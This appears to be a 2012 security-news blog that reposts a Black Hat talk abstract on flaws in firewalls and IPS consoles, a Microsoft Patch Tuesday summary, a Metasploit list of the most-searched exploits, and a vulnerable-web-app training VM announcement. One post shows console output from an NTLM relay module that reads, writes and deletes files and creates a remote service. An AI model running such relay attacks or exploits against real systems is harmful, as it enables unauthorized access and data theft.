Tuesday, July 31, 2012

Blackhat 2010 - The Emperor Has No Clothes: Insecurities in Security Infrastructure

Blackhat 2010 - The Emperor Has No Clothes: Insecurities in Security Infrastructure: BEN FEINSTEIN, JEFF JARMOC & DAN KING

The Emperor Has No Clothes: Insecurities in Security Infrastructure

Your security infrastructure (firewalls, IDS/IPS devices, management consoles, etc.) holds a very sensitive position of trust. This equipment is relied upon to reliably perform security critical functions under potentially hostile conditions. These are highly valuable assets to an attacker, yet their value is sometimes not captured by conventional risk management. This presentation will explore several new vulnerabilities and weaknesses in these products, with the goal of offering useful recommendations and approaches for mitigating the risk.

This presentation explores a series of vulnerabilities and weaknesses in security infrastructure that we discovered and responsibly disclosed. We're in the business of managing and monitoring this gear for our clients, so we have great familiarity with all aspects of its operation. We've found that security infrastructure appears to be just as prone to security vulnerabilities as other commercial software, if not more so.

Daniel King discovered McAfee Network Security Manager (the web-based management appliance for McAfee IPS sensors) was vulnerable to authentication bypass / session hijacking (CVE-2009-3565) and cross-site scripting (CVE-2009-3566) vulnerabilities. We'll demonstrate a proof-of-concept attack scenario that blends these vulnerabilities to gain unauthorized access to the NSM web management interface through cookie stealing and hijacking an administrator's session.

Jeff Jarmoc discovered an access-control list (ACL) bypass vulnerability in Cisco Adaptive Security Appliance (ASA) and Cisco PIX (CVE-2009-1160, Cisco Bug ID CSCsq91277). These devices would fail to apply the expected implicit deny behavior for packets that did not match any ACEs in an ACL.

The TLS renegotiation vulnerability publicly disclosed in November 2009 (CVE-2009-3555) impacted many products, including Cisco Adaptive Security Device Manager (ASDM) (Cisco Bug ID CSCtd00697). We will demonstrate a never before seen proof-of-concept attack that exploits the TLS authentication gap to achieve arbitrary command injection against the Cisco ASDM web-based management interface. A man-in-the-middle may arbitrarily manipulate the ASA policies managed by an ASDM by exploiting the TLS authentication gap. Cisco fixed this in a general deployment release on January 11, 2010 with version 8.2(2). If you haven't patched before seeing this demo, you will want to afterward!

Using these vulnerabilities and weaknesses as illustrative examples, we will offer real-world recommendations for on how to better secure your organization's security infrastructure. Some recommendations include ruling your security infrastructure as within scope during penetration testing and security assessment activities, including product security in your organization's purchasing and product evaluation processes, and somewhat ironically, deployment of security products in the role of compensating controls for potential vulnerabilities in other parts of your organization's security infrastructure.

Wednesday, July 11, 2012

Microsoft Patch Tuesday July 2012 – TLS and Office for Mac?

Microsoft Patch Tuesday July 2012 – TLS and Office for Mac?:
We have nine bulletins to deal with this month three of which are rated critical. One of those critical bulletins covers two CVEs in Internet Explorer with the other two critical bulletins in different parts of Windows. We are looking at a total of 16 CVE numbers this month across all the bulletins.  I found two of these particularly interesting MS-12-049 for it implication in encrypted communications and MS12-051 because you just don’t see OSX application vulnerabilities every day.
Remote Code Execution in XML Core Services
Microsoft has seen use of this one in the wild already, not a lot, but it is out there. The problem lies with XML services, again. You will need to visit a specially crafted web page in order for an attacker to take advantage of this vulnerability but with today’s phishing techniques that’s not too hard. Once you’ve visited that special webpage an attacker has the capability for remote code execution. Not a good thing.  The update changes the way that MSXML initializes objects in memory and applies to Microsoft XML Core Services 3.0 thru 6.0, whether it is critical or moderate depends on specifically which OS and which other applications are installed.
Cumulative Security Update for Internet Explorer
CVE-2012-1522  CVE-2012-1524
A two-fer! 1 bulletin for 2 vulnerabilities! Again we are dealing with a specially crafted webpage, a link to which can be easily delivered via email or instant message so always be careful what you click on. If you do click on a bad link this vulnerability will take advantage of issues in Internet Explorer 9 to give the current users rights to the attacker or allow remote code execution. One deals with how IE handles deleted items, the other with objects in memory. Either way if you run as an admin, which many people do, well, game over. Thankfully this one has not bee seen in the wild, yet.
Remote Code Execution in MS Data Access Components
The final critical bulletin for this month can be found in the Microsoft Data Access components of Windows. Again, an attacker would use a specially crafted web page to launch their attack and would end up with the access rights of the currently logged in user or could run arbitrary code on the target system. So, don’t go surfing the Internet logged in as Admin.
Remote Code Execution in Visual Basic
So if you open a perfectly good MS office file (such as a .docx) that just happens to have specially crafted DLL in the same directory an attacker can then do all kinds of nasty things like delete files, create new accounts, etc… and if your logged in as admin, well, then the bad guys basically own the whole the box. So if you have Visual Basic for Applications SDK, or third party applications that use MS VBA, or even one of several different versions MS office installed you will need this update. Since this one has been seen in the wild you will want to apply this update as soon as you can.
Elevation of Privilege in Kernel-Mode Drivers
CVE-2012-1890 CVE-2012-1893
Another two-fer! No specially crafted web page needed for this one, just a valid set of logon credentials. Once logged in an attacker can run an application that takes advantage of flaws in win32k.sys, a kernel-mode driver. This would allow her to do things her account might not normally be able to do like install apps, delete data or even create new accounts.
Remote Code Execution in Windows Shell
So what is Windows Shell? Its not the command line, it’s a service that manages virtual objects in the user interface into a hierarchical namespace so that users and applications know where the hell to find things. Anyway, this vulnerability deals with object names, specifically file and directory names. To exploit this vulnerability someone would email you a file, or convince you to download a file from a website and when you attempted to run that file the attacker would end up with what would basically amount to complete control of your machine. Ouch.
Information Disclosure in TLS
TLS is the Transport Layer Security Handshake Protocol and is very similar to SSL. SSL is the predecessor of TLS, they are used to encrypt communication sessions between hosts. If the Cipher-block chaining (CBC) method of TLS is used then an attacker could decrypt intercepted encrypted traffic. The update modifies the way that the Windows Secure Channel and the Cryptography API handle encrypted packets. While this vulnerability has been publicly disclosed already it has not yet been seen in the wild, thank goodness, but yeah, patch as soon as you can.
Elevation of Privilege in SharePoint
CVE-2012-1858  CVE-2012-1859  CVE-2012-1860   CVE-2012-1861 
CVE-2012-1862  CVE-2012-1862  CVE-2012-1863
Two-fer? How about a Seven-fer? That’s right this one bulletin corrects seven CVEs. They all have to do with Sharepoint, both 2007 and 2010 but you will also need this update if you are running InfoPath or Groove Server. The issues mostly revolve around how Sharepoint handles HTML strings and how it validates and sanitizes user input. While it looks like CVE-2012-1858 has been publicly disclosed Microsoft hasn’t seen any of these being actively exploited in the wild, yet.
Elevation of Privilege in MS Office for Mac
You may not see OSX application vulnerabilities every day they do in fact exist. Although in this case actually exploiting it takes more than a few steps. First an attacker needs to get a specially crafted application into the Microsoft office folder on an OSX machine and then convince a different user to execute it, preferably one with higher privileges than the attacker. It comes down to the default permissions set on the MS Office for Mac folder which this update addresses, so this is more of a luring attack that a direct elevation of privilege.

Tuesday, July 10, 2012

Exploit Trends: New Microsoft and MySQL Exploits Make the Top 10

Exploit Trends: New Microsoft and MySQL Exploits Make the Top 10:
Exploit Database (DB)
The new Metasploit exploit trends are out, where we give you a list of the top 10 most searched Metasploit exploit and auxiliary modules from our exploit database (DB). These stats are collected by analyzing searches on metasploit.com in our webserver logs, not through usage of Metasploit, which we do not track for privacy reasons.

In June 2012, we also have three new entries on the list, and seven existing contenders. Here they are, annotated with Tod Beardley's excellent comments:

  1. Microsoft Server Service Relative Path Stack Corruption (CVE-2008-4250, MSB-MS08-067): A four year old vulnerability that tends to give the most reliable shells on Windows 2003 Server and Windows XP. It’s also got a great pile of language pack targets. All of Metasploit’s exploits provide US English targeted shellcode, a few might provide Chinese, Spanish, French, or other popular languages; this one has targets in pretty much every language you’ve ever heard of. This exploit is also not ancient, so it’s reasonable to expect to find some unpatched systems in a medium to large enterprise vulnerable to it. More on this topic at Microsoft’s Security TechCenter. Same position as last month.
  2. MS12-020 Microsoft Remote Desktop Use-After-Free DoS (CVE-2012-0002, MSB-MS12-020): This is the 2012 RDP Bug, where it was implied -- but never proven in public -- that a pre-auth bug in RDP can allow for remote code execution. This is likely the most popular module we have due to both recency bias and because there was an unusual level of spontaneous organization of the Metasploit developer community to search for the correct path to remote code execution. So far, nobody’s gotten RCE yet (in public), but the Metasploit module provides the most clues. More on this topic in an article on ZD Net. Same position as last month.
  3. Microsoft Server Service NetpwPathCanonicalize Overflow (CVE-2006-3439, MSB-MS06-040): A six year old vulnerability that’s notable in that there’s no official patch from Microsoft for this on Windows NT 4.0. This was discovered after NT went end-of-life, so if you need remote root on an NT machine (and there are still plenty out there), this is going to be your first choice. More on this topic in at Microsoft’s Security TechCenter. Same position as last month.
  4. Microsoft RPC DCOM Interface Overflow (CVE-2003-0352, MSB-MS03-026): A nine year old vulnerability that used to be the de-facto standard exploit for Windows machines - this is the RPC DCom bug, and it affects ancient NT machines. It was most notable in that it was used by the Blaster and Nachi worms to transit networks. It’s now pretty much a case study in stack buffer overflows in Windows, so it’s got a lot of historical value. If memory serves, this was the most reliable exploit in Metasploit v2. More info on that at Windows IT Pro. Up 2 places from #6 since last month.
  5. MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (CVE-2012-1875): This module was mentioned in the IE Zero-Day Exploits blog post along with the XML Core Services bug, CVE-2012-1889. Also like the XML Core services bug, this bug was being actively exploited in the wild in June of 2012. Unlike the XML Core Services bug, though, this one had a patch. I suspect there was some confusion about which bug was patched and which wasn't, given the modules were released close together and both were mentioned in the same post. Regardless, given the recency of these modules, it's not surprising to see them leap into the top ten for June. New entry since last month.
  6. Microsoft XML Core Services MSXML Uninitialized Memory Corruption (CVE-2012-1889): This vulnerability was recently profiled in Wei "sinn3r" Chen's blog post, New Critical Microsoft IE Zero-Day Exploits. As the title suggests, this module exploits an unpatched vulnerability in Internet Explorer, so that's pretty exciting just in and of itself. In addition, this Metasploit module is the first (and still only) safe and reliable method to test the efficacy of whatever mitigation strategy your client workstations might have implemented.  New entry since last month.
  7. Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop (CVE-2010-0017, MSB-MS10-006): Not sure why this module is popular -- it’s a client side DoS. Historically, it’s a neat DoS, since it demos a bug in Windows 7’s kernel, but all the module does is crash Windows 7 clients after you get a user to connect to you. More info on that at The H Security. Same position as last month.
  8. Microsoft Windows Authenticated User Code Execution (CVE-1999-0504): The PSExec module is a utility module -- given an SMB username and password with sufficient privileges on the target machine, the user can get a shell. It’s not sexy, but it’s super handy for testing payloads and setup. Even though it’s a lowly #10, I’d bet it’s the most-used module in classroom and test environments. More on this topic in at the National Vulnerability Database. Up 2 from #10 since last month.
  9. MySQL Authentication Bypass Password Dump (CVE-2012-2122): This module was featured in HD Moore's June blog post, CVE-2012-2122: A Tragically Comedic Security Flaw in MySQL. It's a fun, recent module that exploits a bug in a popular application in a way that's super-easy to explain, so it's no wonder that this module has all the features of a crowd-pleaser. New entry since last month.
  10. Adobe PDF Embedded EXE Social Engineering (CVE-2010-1240): This module exploits CVE-2010-1240 in Adobe Reader. The idea is that you can embed and execute a Meterpreter PE Executable in a PDF, and when the user opens the PDF, surprise shells! Since it’s on this list, it’s probably the most popular social engineering-style module. More on this topic in at the National Vulnerability Database.  Down 2 places from #8 since last month.
If you want to use any of these exploits right now, you can download Metasploit for free!

Cross-Protocol Chained Pass the Hash for Metasploit

Cross-Protocol Chained Pass the Hash for Metasploit:
Every so often someone writes a Metasploit Module that is pretty epic. Today is one such day:
Screen Shot 2012 07 10 at 1 53 15 AM
Twitter Link: https://twitter.com/webstersprodigy/status/222529916783169536
Which has a link to here: https://github.com/rapid7/metasploit-framework/pull/589
Demo / Example resource files: https://skydrive.live.com/?cid=19794fac33285fd5&resid=19794FAC33285FD5!170&id=19794FAC33285FD5%21170
You can pull the fork w/ branch from here: https://github.com/webstersprodigy/metasploit-framework/tree/module-http-ntlmrelay
And as soon as you do you can start doing this (using the example resource file to put a file, cat it out, enum shares available, list files on a share, then psexec all from a single URL being loaded):
163 address is the Victim I tricked into loading a URL and 182 is the system I want to get onto. This is an HTTP request resulting in a SMB Relay'd auth. It looks as though multiple targets can be used as relay targets but I haven't tested this out yet.
[*] http_ntlmrelay - NTLM Request '/smb_put' from
[*] http_ntlmrelay - Beginning NTLM Relay...
[*] http_ntlmrelay - SMB auth relay succeeded
[*] http_ntlmrelay - File \\\c$\secret.txt written
[*] http_ntlmrelay - NTLM Request '/smb_get' from
[*] http_ntlmrelay - Beginning NTLM Relay...
[*] http_ntlmrelay - SMB auth relay succeeded
[*] http_ntlmrelay - Reading 13 bytes from
[*] http_ntlmrelay - ----Contents----
[*] http_ntlmrelay - hi ima secret
[*] http_ntlmrelay - ----End Contents----
[*] http_ntlmrelay - NTLM Request '/smb_enum' from
[*] http_ntlmrelay - Beginning NTLM Relay...
[*] http_ntlmrelay - SMB auth relay succeeded
[*] http_ntlmrelay - Shares enumerated IPC$ADMIN$C$
[*] http_ntlmrelay - NTLM Request '/smb_ls' from
[*] http_ntlmrelay - Beginning NTLM Relay...
[*] http_ntlmrelay - SMB auth relay succeeded
[*] http_ntlmrelay - Listed 13 files from\c$\
[*] http_ntlmrelay - .rnd
[*] http_ntlmrelay - PerfLogs
[*] http_ntlmrelay - config.sys
[*] http_ntlmrelay - inetpub
[*] http_ntlmrelay - xampp
[*] http_ntlmrelay - ProgramData
[*] http_ntlmrelay - MSOCache
[*] http_ntlmrelay - secret.txt
[*] http_ntlmrelay - autoexec.bat
[*] http_ntlmrelay - Windows
[*] http_ntlmrelay - Users
[*] http_ntlmrelay - Program Files
[*] http_ntlmrelay - NTLM Request '/smb_rm' from
[*] http_ntlmrelay - Beginning NTLM Relay...
[*] http_ntlmrelay - SMB auth relay succeeded
[*] http_ntlmrelay - File \\\c$\secret.txt deleted
[*] http_ntlmrelay - NTLM Request '/smb_pwn' from
[*] http_ntlmrelay - Beginning NTLM Relay...
[*] http_ntlmrelay - SMB auth relay succeeded
[*] http_ntlmrelay - Obtraining a service manager handle...
[*] http_ntlmrelay - Creating a new service
[*] http_ntlmrelay - Closing service handle...
[*] http_ntlmrelay - Opening service...
[*] http_ntlmrelay - Starting the service...
Let the fun begin...

Monday, July 2, 2012


It always helps to have a test bed that helps you hone your attacking skills. GameOver is a new offering from the NULL community that helps you do that even if you are a newbie!
GameOver 0.1
Simply put, Project GameOver was started with the objective of training and educating newbies about the basics of web application security and educate them about the common web attacks and help them understand how they work. It is a collection of various vulnerable web applications, designed with the purpose of learning web application penetration testing.GameOver is a Virtual Machine image, built upon Voyage Linux as its base OS. Voyage is a minimilistic Linux distribution which is in turn based on Debian. For ease of use, GameOver has been broken down into two sections:
  • Section 1consists of special web applications that are designed to teach the basics of webapplication security. This section covers vulnerabilities such as:
  • Section 2 is a collection of deliberately insecure web applications. It provides a legal platform to test your skills and to try and exploit the vulnerabilities and sharpen your skills before you pentest live sites. These applications provide real life environments and will boost their confidence.

Applications contained in GameOver:

  • Section 1:
    1. Damn Vulneable Web Application: (http://www.dvwa.co.uk/)
    2. OWASP WebGoat:(https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project)
    3. Ghost (http://www.gh0s7.net/)
    4. Mutillidae (http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10)
    5. Zap-Wave: (http://code.google.com/p/zaproxy/)
  • Section 2:
    1. Owasp Hacademic Challenges : (https://www.owasp.org/index.php/OWASP_Hackademic_Challenges_Project)
    2. Owasp Vicnum: (https://www.owasp.org/index.php/Category:OWASP_Vicnum_Project)
    3. WackoPicko: (http://www.aldeid.com/wiki/WackoPicko)
    4. Owasp Insecure Web App: (https://www.owasp.org/index.php/Category:OWASP_Insecure_Web_App_Project)
    5. BodgeIT: (http://code.google.com/p/bodgeit/)
    6. PuzzleMall: (https://code.google.com/p/puzzlemall/)
    7. WAVSEP: (https://code.google.com/p/wavsep/)
We have covered almost all of these in our previous posts. You may look them by searching through the blog. Unfortunately, though there is an .ISO provided, in it’s current version GameOver can not be installed in in an virtual environment. It needs to be run as a Live image and you can login with the following credentials:
Username: root
Password: gameover

Download GameOver:

GameOver v1.1GameOver_v0.1_Null_VM.7z/GameOver.0.1.null.isohttp://sourceforge.net/projects/null-gameover/files/